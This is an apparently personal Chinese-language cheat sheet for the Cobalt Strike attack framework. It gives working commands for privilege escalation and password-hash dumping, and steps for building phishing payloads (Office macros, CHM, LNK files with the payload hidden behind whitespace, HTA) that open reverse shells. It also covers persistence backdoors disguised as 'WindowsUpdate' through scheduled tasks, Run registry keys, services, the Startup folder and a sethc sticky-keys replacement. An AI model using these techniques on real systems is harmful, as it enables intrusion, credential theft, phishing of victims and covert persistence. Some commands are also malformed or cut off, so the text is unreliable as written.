跳转至

cobaltstrike

神器CS

安装

CS分为服务端和客户端,两者分离,非常适合部署在VPS上,然后进行团队作战

服务端

需要Java环境

./teamserver vps_ip password

客户端

需要Java环境,然后本机直接点击Jar包,执行即可,然后按提示填写vps_ip和password

使用

常见命令

# 查看用户
getuid
# 过uac提权
bypassuac
# 提升到system权限
getsystem
# 获取用户hash
hashdump
# 快速使用mimikatz获取用户明文密码
wdigest
# 查看下载任务
downloads
# 下载文件
download 文件路径
# 取消指定下载任务
cancel 下载任务名
# 列出盘符
drives
# 启用socks4代理
socks
# 停止socks4代理
socks stop
# 系统命令
cp mv rm ls mkdir ps
# 查看后台任务
jobs
# 停止一个任务
jobkill JID

meterpreter cobalt-strike

cobalt strike派生一个shell给meterpreter

在cobalt strike中添加listener,该listener的IP和PORT为meterpreter监听的地址和端口
spawn listener_name

meterpreter派生一个shell给cobalt strike

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST cs_ipset
set LPORT cs_port
set session 1
exploit

钓鱼

OFFICE

  1. cobalt strike中attacks->packages->ms office macro生成office宏
  2. 新建word文档,在上方标签栏找到视图,点击宏按钮,输入宏名称并创建,清空默认数据后将第一步生成的office宏粘贴到宏编辑器中,保存退出
  3. 双击运行,即可反弹shell,启动后会在任务管理器中多出一个rundll32.exe进程

CHM

  1. 制作CHM,创建如下所示的文件夹列表
文件夹名称1
 index.html
 文件夹名称2
     index.html
 文件夹名称3
     index.html
  1. 在文件夹名称1下的index.html中写入
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>

其中calc.exe为payload

  1. 生成payload

cobalt strike中Attacks->Web Drive-by->Scripted Web Delivery,LHOST和LPORT为listener

  1. 使用EasyCHM生成CHM文件

  2. 新建工程

  3. 导入第一步创建的文件夹,并点击保存,编译,最后生成CHM

  4. 双击打开CHM文件,即可执行命令

LNK

  1. 生成payload

在cobalt strike中的Attacks->Web Drive-by ->Scripted Web Delivery,类型为launch,生成payload,保存至test.txt文件中

  1. 生成快捷方式

powershell代码

$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                    '+ $file
$Shortcut.Save()

保存至1.ps1,右键运行该powershell程序,生成test.lnk

  1. 双击执行,反弹shell

HTA

  1. 在cobalt strike中的Attacks->Packages->HTML Application,选择powershell生成相应的HTA文件
  2. 双击运行,反弹shell

权限维持

计划任务

上传后门并隐藏文件

cd C:\Windows\Temp
upload artifact.exe
attrib "artifact.exe" +h +s

创建计划任务WindowsUpdate,频率一分钟

schtasks /create /tn WindowsUpdate /tr "artifact.exe" /sc minute /mo 1

删除计划任务

schtasks /delete /tn WindowsUpdate

注册表

上传后门并隐藏文件

cd C:\Windows\Temp
upload artifact.exe
attrib "artifact.exe" +h +s

修改注册表

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\Temp\artifact.exe" /f

删除注册表

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /f

windows服务sc

上传后门并隐藏文件

cd C:\Windows\Temp
upload artifact.exe
shell attrib "artifact.exe" +h +s

创建并启动Windows服务

sc create "WindowsUpdate" binpath= "cmd /c start C:\C:\Windows\Temp\artifact.exe";
sc config "WindowsUpdate" start= auto
net start WindowsUpdate

自启目录

上传后门

cd C:\Windows\Temp
upload artifact.exe

设置自启目录(注意Administrator目录)

copy "C:\Windows\Temp\artifact.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y
del C:\Windows\Temp\artifact.exe

隐藏文件

attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +h +s

shift后门

takeown /f C:\windows\system32\sethc.* /a /r /d y&&cacls C:\windows\system32\sethc.exe /T /E /G system:F&&copy "" C:\windows\system32\sethc.exe /y